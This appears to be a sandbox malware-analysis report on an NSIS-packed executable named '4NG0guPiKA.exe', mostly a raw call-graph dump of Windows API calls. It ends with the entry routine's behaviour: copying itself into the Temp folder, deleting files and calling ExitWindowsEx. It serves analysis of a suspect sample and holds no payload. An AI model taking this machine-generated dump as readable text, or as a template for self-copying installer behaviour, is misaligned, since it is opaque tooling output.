404f0b 4122->4127 4134 4050f3 4122->4134 4139 404eb8 SendMessageW 4122->4139 4128 405f0c 18 API calls 4123->4128 4124 404e40 4124->4122 4135 404e51 SendMessageW 4124->4135 4125->4122 4125->4124 4132 404ddb 4125->4132 4129 404f15 SendMessageW 4127->4129 4130 404f1d 4127->4130 4131 404c27 SendMessageW SendMessageW 4128->4131 4129->4130 4136 404f46 4130->4136 4142 404f36 4130->4142 4143 404f2f ImageList_Destroy 4130->4143 4131->4120 4137 404a5e 5 API calls 4132->4137 4133 404c59 4138 40412f 19 API calls 4133->4138 4185 404196 4134->4185 4135->4122 4147 4050b5 4136->4147 4162 404ade 4 API calls 4136->4162 4166 404f81 4136->4166 4161 404dec 4137->4161 4149 404c67 4138->4149 4139->4134 4144 404ecd SendMessageW 4139->4144 4142->4136 4145 404f3f GlobalFree 4142->4145 4143->4142 4150 404ee0 4144->4150 4145->4136 4146 404d3c GetWindowLongW SetWindowLongW 4148 404d55 4146->4148 4147->4134 4151 4050c7 ShowWindow GetDlgItem ShowWindow 4147->4151 4152 404d73 4148->4152 4153 404d5b ShowWindow 4148->4153 4149->4146 4156 404cb7 SendMessageW 4149->4156 4158 404d36 4149->4158 4159 404cf3 SendMessageW 4149->4159 4160 404d04 SendMessageW 4149->4160 4157 404ef1 SendMessageW 4150->4157 4151->4134 4176 404164 SendMessageW 4152->4176 4175 404164 SendMessageW 4153->4175 4156->4149 4157->4127 4158->4146 4158->4148 4159->4149 4160->4149 4161->4124 4162->4166 4163 404d6e 4163->4134 4164 40508b InvalidateRect 4164->4147 4165 4050a1 4164->4165 4177 404978 4165->4177 4167 404faf SendMessageW 4166->4167 4168 404fc5 4166->4168 4167->4168 4168->4164 4169 405026 4168->4169 4171 405039 SendMessageW SendMessageW 4168->4171 4169->4171 4171->4168 4173 405f0c 18 API calls 4172->4173 4174 40413a SetDlgItemTextW 4173->4174 4174->4133 4175->4163 4176->4125 4178 404995 4177->4178 4179 405f0c 18 API calls 4178->4179 4180 4049ca 4179->4180 4181 405f0c 18 API calls 4180->4181 4182 4049d5 4181->4182 4183 405f0c 18 API calls 4182->4183 4184 404a06 lstrlenW wsprintfW SetDlgItemTextW 4183->4184 4184->4147 4186 4041ae GetWindowLongW 4185->4186 4196 404237 4185->4196 4187 4041bf 4186->4187 4186->4196 4188 4041d1 4187->4188 4189 4041ce GetSysColor 4187->4189 4190 4041e1 SetBkMode 4188->4190 4191 4041d7 SetTextColor 4188->4191 4189->4188 4192 4041f9 GetSysColor 4190->4192 4193 4041ff 4190->4193 4191->4190 4192->4193 4194 404210 4193->4194 4195 404206 SetBkColor 4193->4195 4194->4196 4197 404223 DeleteObject 4194->4197 4198 40422a CreateBrushIndirect 4194->4198 4195->4194 4197->4198 4198->4196 5383 401491 5384 405194 25 API calls 5383->5384 5385 401498 5384->5385 5386 404912 5387 404922 5386->5387 5388 40493e 5386->5388 5397 4056aa GetDlgItemTextW 5387->5397 5390 404971 5388->5390 5391 404944 SHGetPathFromIDListW 5388->5391 5393 40495b SendMessageW 5391->5393 5394 404954 5391->5394 5392 40492f SendMessageW 5392->5388 5393->5390 5396 40140b 2 API calls 5394->5396 5396->5393 5397->5392 5398 402295 5399 402b3a 18 API calls 5398->5399 5400 4022a4 5399->5400 5401 402b3a 18 API calls 5400->5401 5402 4022ad 5401->5402 5403 402b3a 18 API calls 5402->5403 5404 4022b7 GetPrivateProfileStringW 5403->5404 4441 401718 4442 402b3a 18 API calls 4441->4442 4443 40171f SearchPathW 4442->4443 4444 40173a 4443->4444 4445 401f98 4446 401faa 4445->4446 4456 40205c 4445->4456 4447 402b3a 18 API calls 4446->4447 4448 401fb1 4447->4448 4450 402b3a 18 API calls 4448->4450 4449 401423 25 API calls 4451 402197 4449->4451 4452 401fba 4450->4452 4453 401fd0 LoadLibraryExW 4452->4453 4454 401fc2 GetModuleHandleW 4452->4454 4455 401fe1 4453->4455 4453->4456 4454->4453 4454->4455 4468 4062c0 WideCharToMultiByte 4455->4468 4456->4449 4459 401ff2 4461 402011 4459->4461 4462 401ffa 4459->4462 4460 40202b 4463 405194 25 API calls 4460->4463 4471 10001771 4461->4471 4464 401423 25 API calls 4462->4464 4465 402002 4463->4465 4464->4465 4465->4451 4466 40204e FreeLibrary 4465->4466 4466->4451 4469 4062ea GetProcAddress 4468->4469 4470 401fec 4468->4470 4469->4470 4470->4459 4470->4460 4472 100017a1 4471->4472 4513 10001b3e 4472->4513 4474 100017a8 4475 100018be 4474->4475 4476 100017c0 4474->4476 4477 100017b9 4474->4477 4475->4465 4547 100022eb 4476->4547 4565 100022a1 4477->4565 4482 100017e5 4484 10001824 4482->4484 4485 10001806 4482->4485 4483 100017d6 4491 100017e7 4483->4491 4492 100017dc 4483->4492 4487 10001866 4484->4487 4488 1000182a 4484->4488 4578 1000248d 4485->4578 4496 1000248d 10 API calls 4487->4496 4494 100015cc 3 API calls 4488->4494 4489 100017ef 4489->4482 4575 10002b23 4489->4575 4569 1000260b 4491->4569 4492->4482 4559 10002868 4492->4559 4499 10001840 4494->4499 4500 10001858 4496->4500 4503 1000248d 10 API calls 4499->4503 4504 100018ad 4500->4504 4601 10002450 4500->4601 4502 100017ed 4502->4482 4503->4500 4504->4475 4508 100018b7 GlobalFree 4504->4508 4508->4475 4510 10001899 4510->4504 4605 10001555 wsprintfW 4510->4605 4511 10001892 FreeLibrary 4511->4510 4608 1000121b GlobalAlloc 4513->4608 4515 10001b62 4609 1000121b GlobalAlloc 4515->4609 4517 10001b6d 4610 10001243 4517->4610 4519 10001da0 GlobalFree GlobalFree GlobalFree 4520 10001dbd 4519->4520 4536 10001e07 4519->4536 4521 1000210d 4520->4521 4529 10001dd2 4520->4529 4520->4536 4523 1000212f GetModuleHandleW 4521->4523 4521->4536 4522 10001c43 GlobalAlloc 4544 10001b75 4522->4544 4524 10002140 LoadLibraryW 4523->4524 4525 10002155 4523->4525 4524->4525 4524->4536 4621 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4525->4621 4526 10001c8e lstrcpyW 4530 10001c98 lstrcpyW 4526->4530 4527 10001cac GlobalFree 4527->4544 4529->4536 4617 1000122c 4529->4617 4530->4544 4531 100021a7 4533 100021b4 lstrlenW 4531->4533 4531->4536 4532 10002067 4532->4536 4539 100020af lstrcpyW 4532->4539 4622 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4533->4622 4536->4474 4537 10002167 4537->4531 4546 10002191 GetProcAddress 4537->4546 4539->4536 4540 10001cea 4540->4544 4615 100015a7 GlobalSize GlobalAlloc 4540->4615 4541 10001f56 GlobalFree 4541->4544 4542 100021ce 4542->4536 4544->4519 4544->4522 4544->4526 4544->4527 4544->4530 4544->4532 4544->4536 4544->4540 4544->4541 4545 1000122c 2 API calls 4544->4545 4620 1000121b GlobalAlloc 4544->4620 4545->4544 4546->4531 4550 10002303 4547->4550 4548 1000122c GlobalAlloc lstrcpynW 4548->4550 4549 10001243 3 API calls 4549->4550 4550->4548 4550->4549 4552 10002419 GlobalFree 4550->4552 4554 100023d5 GlobalAlloc WideCharToMultiByte 4550->4554 4555 100023ae GlobalAlloc 4550->4555 4556 10002390 lstrlenW 4550->4556 4625 100012c8 4550->4625 4552->4550 4553 100017c6 4552->4553 4553->4482 4553->4483 4553->4489 4554->4552 4557 1000239b 4555->4557 4556->4552 4556->4557 4557->4552 4630 1000259f 4557->4630 4561 1000287a 4559->4561 4560 1000291f EnumWindows 4562 1000293d 4560->4562 4561->4560 4563 10002a39 4562->4563 4564 10002a2e GetLastError 4562->4564 4563->4482 4564->4563 4566 100022b1 4565->4566 4567 100017bf 4565->4567 4566->4567 4568 100022c3 GlobalAlloc 4566->4568 4567->4476 4568->4566 4573 10002627 4569->4573 4570 10002678 GlobalAlloc 4574 1000269a 4570->4574 4571 1000268b 4572 10002690 GlobalSize 4571->4572 4571->4574 4572->4574 4573->4570 4573->4571 4574->4502 4576 10002b2e 4575->4576 4577 10002b6e GlobalFree 4576->4577 4580 100024ad 4578->4580 4581 100024db wsprintfW 4580->4581 4582 10002558 GlobalFree 4580->4582 4583 1000250e MultiByteToWideChar 4580->4583 4584 10002581 GlobalFree 4580->4584 4586 100024fd lstrcpynW 4580->4586 4587 100024ec StringFromGUID2 4580->4587 4588 10001280 2 API calls 4580->4588 4633 1000121b GlobalAlloc 4580->4633 4634 100012f3 4580->4634 4581->4580 4582->4580 4583->4580 4584->4580 4585 1000180c 4584->4585 4590 100015cc 4585->4590 4586->4580 4587->4580 4588->4580 4638 1000121b GlobalAlloc 4590->4638 4592 100015d2 4593 100015df lstrcpyW 4592->4593 4595 100015f9 4592->4595 4596 10001613 4593->4596 4595->4596 4597 100015fe wsprintfW 4595->4597 4598 10001280 4596->4598 4597->4596 4599 100012c3 GlobalFree 4598->4599 4600 10001289 GlobalAlloc lstrcpynW 4598->4600 4599->4500 4600->4599 4602 1000245e 4601->4602 4604 10001879 4601->4604 4603 1000247a GlobalFree 4602->4603 4602->4604 4603->4602 4604->4510 4604->4511 4606 10001280 2 API calls 4605->4606 4607 10001576 4606->4607 4607->4504 4608->4515 4609->4517 4611 1000127c 4610->4611 4612 1000124d 4610->4612 4611->4544 4612->4611 4623 1000121b GlobalAlloc 4612->4623 4614 10001259 lstrcpyW GlobalFree 4614->4544 4616 100015c5 4615->4616 4616->4540 4624 1000121b GlobalAlloc 4617->4624 4619 1000123b lstrcpynW 4619->4536 4620->4544 4621->4537 4622->4542 4623->4614 4624->4619 4626 100012d0 4625->4626 4627 100012ee 4625->4627 4626->4627 4628 1000122c 2 API calls 4626->4628 4627->4627 4629 100012ec 4628->4629 4629->4550 4631 10002603 4630->4631 4632 100025ad VirtualAlloc 4630->4632 4631->4557 4632->4631 4633->4580 4635 10001324 4634->4635 4636 100012fc 4634->4636 4635->4580 4636->4635 4637 10001308 lstrcpyW 4636->4637 4637->4635 4638->4592 5405 10001058 5406 10001243 3 API calls 5405->5406 5408 10001074 5406->5408 5407 100010dd 5408->5407 5409 1000152e 4 API calls 5408->5409 5410 10001092 5408->5410 5409->5410 5411 1000152e 4 API calls 5410->5411 5412 100010a2 5411->5412 5413 100010b2 5412->5413 5414 100010a9 GlobalSize 5412->5414 5415 100010b6 GlobalAlloc 5413->5415 5416 100010c7 5413->5416 5414->5413 5417 10001555 3 API calls 5415->5417 5418 100010d2 GlobalFree 5416->5418 5417->5416 5418->5407 5419 40159b 5420 402b3a 18 API calls 5419->5420 5421 4015a2 SetFileAttributesW 5420->5421 5422 4015b4 5421->5422 5423 40149e 5424 4014ac PostQuitMessage 5423->5424 5425 40223e 5423->5425 5424->5425 5426 4021a0 5427 402b3a 18 API calls 5426->5427 5428 4021a6 5427->5428 5429 402b3a 18 API calls 5428->5429 5430 4021af 5429->5430 5431 402b3a 18 API calls 5430->5431 5432 4021b8 5431->5432 5433 40622d 2 API calls 5432->5433 5434 4021c1 5433->5434 5435 4021d2 lstrlenW lstrlenW 5434->5435 5439 4021c5 5434->5439 5437 405194 25 API calls 5435->5437 5436 405194 25 API calls 5440 4021cd 5436->5440 5438 402210 SHFileOperationW 5437->5438 5438->5439 5438->5440 5439->5436 5439->5440 5441 100010e1 5442 10001111 5441->5442 5443 10001243 3 API calls 5442->5443 5453 10001121 5443->5453 5444 100011d8 GlobalFree 5445 100012c8 2 API calls 5445->5453 5446 10001243 3 API calls 5446->5453 5447 100011d3 5447->5444 5448 100011f8 GlobalFree 5448->5453 5449 10001280 2 API calls 5452 100011c4 GlobalFree 5449->5452 5450 10001164 GlobalAlloc 5450->5453 5451 100012f3 lstrcpyW 5451->5453 5452->5453 5453->5444 5453->5445 5453->5446 5453->5447 5453->5448 5453->5449 5453->5450 5453->5451 5453->5452 3872 401b22 3873 401b73 3872->3873 3874 401b2f 3872->3874 3876 401b78 3873->3876 3877 401b9d GlobalAlloc 3873->3877 3875 401bb8 3874->3875 3880 401b46 3874->3880 3879 405f0c 18 API calls 3875->3879 3884 40223e 3875->3884 3876->3884 3893 405eea lstrcpynW 3876->3893 3878 405f0c 18 API calls 3877->3878 3878->3875 3883 402238 3879->3883 3891 405eea lstrcpynW 3880->3891 3894 4056c6 3883->3894 3885 401b8a GlobalFree 3885->3884 3886 401b55 3892 405eea lstrcpynW 3886->3892 3889 401b64 3889->3884 3898 405eea lstrcpynW 3889->3898 3891->3886 3892->3889 3893->3885 3895 4056db 3894->3895 3896 405727 3895->3896 3897 4056ef MessageBoxIndirectW 3895->3897 3896->3884 3897->3896 3898->3884 3899 401924 3900 401926 3899->3900 3901 402b3a 18 API calls 3900->3901 3902 40192b 3901->3902 3905 405772 3902->3905 3944 405a3d 3905->3944 3908 4057b1 3911 4058d1 3908->3911 3958 405eea lstrcpynW 3908->3958 3909 40579a DeleteFileW 3910 401934 3909->3910 3911->3910 3988 40622d FindFirstFileW 3911->3988 3913 4057d7 3914 4057ea 3913->3914 3915 4057dd lstrcatW 3913->3915 3959 405981 lstrlenW 3914->3959 3917 4057f0 3915->3917 3920 405800 lstrcatW 3917->3920 3921 40580b lstrlenW FindFirstFileW 3917->3921 3920->3921 3921->3911 3929 40582d 3921->3929 3922 4058fa 3991 405935 lstrlenW CharPrevW 3922->3991 3925 4058b4 FindNextFileW 3925->3929 3930 4058ca FindClose 3925->3930 3926 40572a 5 API calls 3928 40590c 3926->3928 3931 405910 3928->3931 3932 405926 3928->3932 3929->3925 3938 405875 3929->3938 3963 405eea lstrcpynW 3929->3963 3930->3911 3931->3910 3935 405194 25 API calls 3931->3935 3934 405194 25 API calls 3932->3934 3934->3910 3937 40591d 3935->3937 3936 405772 64 API calls 3936->3938 3940 405d84 40 API calls 3937->3940 3938->3925 3938->3936 3939 405194 25 API calls 3938->3939 3964 40572a 3938->3964 3972 405194 3938->3972 3983 405d84 3938->3983 3939->3925 3942 405924 3940->3942 3942->3910 3994 405eea lstrcpynW 3944->3994 3946 405a4e 3995 4059e0 CharNextW CharNextW 3946->3995 3949 405792 3949->3908 3949->3909 3950 40617e 5 API calls 3956 405a64 3950->3956 3951 405a95 lstrlenW 3952 405aa0 3951->3952 3951->3956 3954 405935 3 API calls 3952->3954 3953 40622d 2 API calls 3953->3956 3955 405aa5 GetFileAttributesW 3954->3955 3955->3949 3956->3949 3956->3951 3956->3953 3957 405981 2 API calls 3956->3957 3957->3951 3958->3913 3960 40598f 3959->3960 3961 4059a1 3960->3961 3962 405995 CharPrevW 3960->3962 3961->3917 3962->3960 3962->3961 3963->3929 4001 405b31 GetFileAttributesW 3964->4001 3967 405757 3967->3938 3968 405745 RemoveDirectoryW 3970 405753 3968->3970 3969 40574d DeleteFileW 3969->3970 3970->3967 3971 405763 SetFileAttributesW 3970->3971 3971->3967 3973 4051af 3972->3973 3981 405251 3972->3981 3974 4051cb lstrlenW 3973->3974 3975 405f0c 18 API calls 3973->3975 3976 4051f4 3974->3976 3977 4051d9 lstrlenW 3974->3977 3975->3974 3979 405207 3976->3979 3980 4051fa SetWindowTextW 3976->3980 3978 4051eb lstrcatW 3977->3978 3977->3981 3978->3976 3979->3981 3982 40520d SendMessageW SendMessageW SendMessageW 3979->3982 3980->3979 3981->3938 3982->3981 4004 406254 GetModuleHandleA 3983->4004 3987 405dac 3987->3938 3989 406243 FindClose 3988->3989 3990 4058f6 3988->3990 3989->3990 3990->3910 3990->3922 3992 405951 lstrcatW 3991->3992 3993 405900 3991->3993 3992->3993 3993->3926 3994->3946 3996 4059fd 3995->3996 3999 405a0f 3995->3999 3998 405a0a CharNextW 3996->3998 3996->3999 3997 405a33 3997->3949 3997->3950 3998->3997 3999->3997 4000 405962 CharNextW 3999->4000 4000->3999 4002 405736 4001->4002 4003 405b43 SetFileAttributesW 4001->4003 4002->3967 4002->3968 4002->3969 4003->4002 4005 406270 LoadLibraryA 4004->4005 4006 40627b GetProcAddress 4004->4006 4005->4006 4007 405d8b 4005->4007 4006->4007 4007->3987 4008 405c08 lstrcpyW 4007->4008 4009 405c31 4008->4009 4010 405c57 GetShortPathNameW 4008->4010 4033 405b56 GetFileAttributesW CreateFileW 4009->4033 4011 405c6c 4010->4011 4012 405d7e 4010->4012 4011->4012 4014 405c74 wsprintfA 4011->4014 4012->3987 4017 405f0c 18 API calls 4014->4017 4015 405c3b CloseHandle GetShortPathNameW 4015->4012 4016 405c4f 4015->4016 4016->4010 4016->4012 4018 405c9c 4017->4018 4034 405b56 GetFileAttributesW CreateFileW 4018->4034 4020 405ca9 4020->4012 4021 405cb8 GetFileSize GlobalAlloc 4020->4021 4022 405d77 CloseHandle 4021->4022 4023 405cda 4021->4023 4022->4012 4035 405bd9 ReadFile 4023->4035 4028 405cf9 lstrcpyA 4031 405d1b 4028->4031 4029 405d0d 4030 405abb 4 API calls 4029->4030 4030->4031 4032 405d52 SetFilePointer WriteFile GlobalFree 4031->4032 4032->4022 4033->4015 4034->4020 4036 405bf7 4035->4036 4036->4022 4037 405abb lstrlenA 4036->4037 4038 405afc lstrlenA 4037->4038 4039 405b04 4038->4039 4040 405ad5 lstrcmpiA 4038->4040 4039->4028 4039->4029 4040->4039 4041 405af3 CharNextA 4040->4041 4041->4038 5461 402224 5462 40223e 5461->5462 5463 40222b 5461->5463 5464 405f0c 18 API calls 5463->5464 5465 402238 5464->5465 5466 4056c6 MessageBoxIndirectW 5465->5466 5466->5462 5467 10001667 5468 1000152e 4 API calls 5467->5468 5471 1000167f 5468->5471 5469 100016c5 GlobalFree 5470 1000169a 5470->5469 5471->5469 5471->5470 5472 100016b1 VirtualFree 5471->5472 5472->5469 5473 402729 5474 402730 5473->5474 5475 4029c7 5473->5475 5476 402736 FindClose 5474->5476 5476->5475 5477 401cab 5478 402b1d 18 API calls 5477->5478 5479 401cb2 5478->5479 5480 402b1d 18 API calls 5479->5480 5481 401cba GetDlgItem 5480->5481 5482 4024e8 5481->5482 5483 4016af 5484 402b3a 18 API calls 5483->5484 5485 4016b5 GetFullPathNameW 5484->5485 5486 4016f1 5485->5486 5487 4016cf 5485->5487 5488 401706 GetShortPathNameW 5486->5488 5489 4029c7 5486->5489 5487->5486 5490 40622d 2 API calls 5487->5490 5488->5489 5491 4016e1 5490->5491 5491->5486 5493 405eea lstrcpynW 5491->5493 5493->5486 4225 402331 4226 402337 4225->4226 4227 402b3a 18 API calls 4226->4227 4228 402349 4227->4228 4229 402b3a 18 API calls 4228->4229 4230 402353 RegCreateKeyExW 4229->4230 4231 402793 4230->4231 4232 40237d 4230->4232 4233 402398 4232->4233 4234 402b3a 18 API calls 4232->4234 4235 4023a4 4233->4235 4237 402b1d 18 API calls 4233->4237 4236 40238e lstrlenW 4234->4236 4238 4023bf RegSetValueExW 4235->4238 4242 403062 4235->4242 4236->4233 4237->4235 4239 4023d5 RegCloseKey 4238->4239 4239->4231 4243 403072 SetFilePointer 4242->4243 4244 40308e 4242->4244 4243->4244 4257 40317d GetTickCount 4244->4257 4247 405bd9 ReadFile 4248 4030ae 4247->4248 4249 40317d 43 API calls 4248->4249 4253 403139 4248->4253 4250 4030c5 4249->4250 4251 40313f ReadFile 4250->4251 4250->4253 4254 4030d5 4250->4254 4251->4253 4253->4238 4254->4253 4255 405bd9 ReadFile 4254->4255 4256 403108 WriteFile 4254->4256 4255->4254 4256->4253 4256->4254 4258 4032e7 4257->4258 4259 4031ac 4257->4259 4260 402d1a 33 API calls 4258->4260 4270 40330f SetFilePointer 4259->4270 4268 403095 4260->4268 4262 4031b7 SetFilePointer 4267 4031dc 4262->4267 4266 403271 WriteFile 4266->4267 4266->4268 4267->4266 4267->4268 4269 4032c8 SetFilePointer 4267->4269 4271 4032f9 4267->4271 4274 406390 4267->4274 4281 402d1a 4267->4281 4268->4247 4268->4253 4269->4258 4270->4262 4272 405bd9 ReadFile 4271->4272 4273 40330c 4272->4273 4273->4267 4275 4063b5 4274->4275 4278 4063bd 4274->4278 4275->4267 4276 406444 GlobalFree 4277 40644d GlobalAlloc 4276->4277 4277->4275 4277->4278 4278->4275 4278->4276 4278->4277 4279 4064c4 GlobalAlloc 4278->4279 4280 4064bb GlobalFree 4278->4280 4279->4275 4279->4278 4280->4279 4282 402d43 4281->4282 4283 402d2b 4281->4283 4285 402d53 GetTickCount 4282->4285 4286 402d4b 4282->4286 4284 402d34 DestroyWindow 4283->4284 4289 402d3b 4283->4289 4284->4289 4288 402d61 4285->4288 4285->4289 4287 40628d 2 API calls 4286->4287 4287->4289 4290 402d96 CreateDialogParamW ShowWindow 4288->4290 4291 402d69 4288->4291 4289->4267 4290->4289 4291->4289 4296 402cfe 4291->4296 4293 402d77 wsprintfW 4294 405194 25 API calls 4293->4294 4295 402d94 4294->4295 4295->4289 4297 402d0d 4296->4297 4298 402d0f MulDiv 4296->4298 4297->4298 4298->4293 5501 4014b8 5502 4014be 5501->5502 5503 401389 2 API calls 5502->5503 5504 4014c6 5503->5504 4648 4015b9 4649 402b3a 18 API calls 4648->4649 4650 4015c0 4649->4650 4651 4059e0 4 API calls 4650->4651 4661 4015c9 4651->4661 4652 401614 4654 401646 4652->4654 4655 401619 4652->4655 4653 405962 CharNextW 4656 4015d7 CreateDirectoryW 4653->4656 4660 401423 25 API calls 4654->4660 4657 401423 25 API calls 4655->4657 4658 4015ed GetLastError 4656->4658 4656->4661 4659 401620 4657->4659 4658->4661 4662 4015fa GetFileAttributesW 4658->4662 4666 405eea lstrcpynW 4659->4666 4665 40163e 4660->4665 4661->4652 4661->4653 4662->4661 4664 40162d SetCurrentDirectoryW 4664->4665 4666->4664 5505 401939 5506 402b3a 18 API calls 5505->5506 5507 401940 lstrlenW 5506->5507 5508 4024e8 5507->5508 4880 40173f 4881 402b3a 18 API calls 4880->4881 4882 401746 4881->4882 4883 405b85 2 API calls 4882->4883 4884 40174d 4883->4884 4885 405b85 2 API calls 4884->4885 4885->4884 5509 40653f 5510 4063c3 5509->5510 5511 406d2e 5510->5511 5512 406444 GlobalFree 5510->5512 5513 40644d GlobalAlloc 5510->5513 5514 4064c4 GlobalAlloc 5510->5514 5515 4064bb GlobalFree 5510->5515 5512->5513 5513->5510 5513->5511 5514->5510 5514->5511 5515->5514

                                                                                                            Executed Functions

                                                                                                            Function 0040335A Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335stringfilecomCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 40335a-4033f0 #17 SetErrorMode OleInitialize call 406254 SHGetFileInfoW call 405eea GetCommandLineW call 405eea GetModuleHandleW 7 4033f2-4033f9 0->7 8 4033fa-40340c call 405962 CharNextW 0->8 7->8 11 4034da-4034e0 8->11 12 403411-403417 11->12 13 4034e6 11->13 14 403420-403426 12->14 15 403419-40341e 12->15 16 4034fa-403514 GetTempPathW call 403326 13->16 18 403428-40342c 14->18 19 40342d-403431 14->19 15->14 15->15 23 403516-403534 GetWindowsDirectoryW lstrcatW call 403326 16->23 24 40356c-403586 DeleteFileW call 402dbc 16->24 18->19 21 403437-40343d 19->21 22 4034cb-4034d6 call 405962 19->22 26 403457-40346e 21->26 27 40343f-403446 21->27 22->11 39 4034d8-4034d9 22->39 23->24 42 403536-403566 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 23->42 44 40361c-40362b call 4037c2 OleUninitialize 24->44 45 40358c-403592 24->45 28 403470-403486 26->28 29 40349c-4034b2 26->29 33 403448-40344b 27->33 34 40344d 27->34 28->29 35 403488-403490 28->35 29->22 37 4034b4-4034c9 29->37 33->26 33->34 34->26 40 403492-403495 35->40 41 403497 35->41 37->22 43 4034e8-4034f5 call 405eea 37->43 39->11 40->29 40->41 41->29 42->24 42->44 43->16 55 403631-403641 call 4056c6 ExitProcess 44->55 56 403727-40372d 44->56 48 403594-40359f call 405962 45->48 49 40360c-403613 call 4038b4 45->49 62 4035a1-4035b2 48->62 63 4035d6-4035e0 48->63 58 403618 49->58 60 4037aa-4037b2 56->60 61 40372f-40374c call 406254 * 3 56->61 58->44 65 4037b4 60->65 66 4037b8-4037bc ExitProcess 60->66 90 403796-4037a1 ExitWindowsEx 61->90 91 40374e-403750 61->91 64 4035b4-4035b6 62->64 68 4035e2-4035f0 call 405a3d 63->68 69 403647-403661 lstrcatW lstrcmpiW 63->69 71 4035d0-4035d4 64->71 72 4035b8-4035ce 64->72 65->66 68->44 81 4035f2-403608 call 405eea * 2 68->81 69->44 74 403663-403679 CreateDirectoryW SetCurrentDirectoryW 69->74 71->63 71->64 72->63 72->71 78 403686-4036af call 405eea 74->78 79 40367b-403681 call 405eea 74->79 89 4036b4-4036d0 call 405f0c DeleteFileW 78->89 79->78 81->49 100 403711-403719 89->100 101 4036d2-4036e2 CopyFileW 89->101 90->60 96 4037a3-4037a5 call 40140b 90->96 91->90 94 403752-403754 91->94 94->90 98 403756-403768 GetCurrentProcess 94->98 96->60 98->90 108 40376a-40378c 98->108 100->89 103 40371b-403722 call 405d84 100->103 101->100 102 4036e4-403704 call 405d84 call 405f0c call 405665 101->102 102->100 115 403706-40370d CloseHandle 102->115 103->44 108->90 115->100
                                                                                                            APIs
                                                                                                            • #17.COMCTL32 ref: 00403379
                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                              • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                              • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                              • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                            • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                              • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                            • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\4NG0guPiKA.exe",00000000), ref: 004033DB
                                                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\4NG0guPiKA.exe",00000020), ref: 00403402
                                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040350B
                                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351C
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403528
                                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353C
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403544
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403555
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355D
                                                                                                            • DeleteFileW.KERNELBASE(1033), ref: 00403571
                                                                                                            • OleUninitialize.OLE32(?), ref: 00403621
                                                                                                            • ExitProcess.KERNEL32 ref: 00403641
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\4NG0guPiKA.exe",00000000,?), ref: 0040364D
                                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\4NG0guPiKA.exe",00000000,?), ref: 00403659
                                                                                                            • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403665
                                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366C
                                                                                                            • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
                                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\4NG0guPiKA.exe,0041FE90,00000001), ref: 004036DA
                                                                                                            • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
                                                                                                            • ExitProcess.KERNEL32 ref: 004037BC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
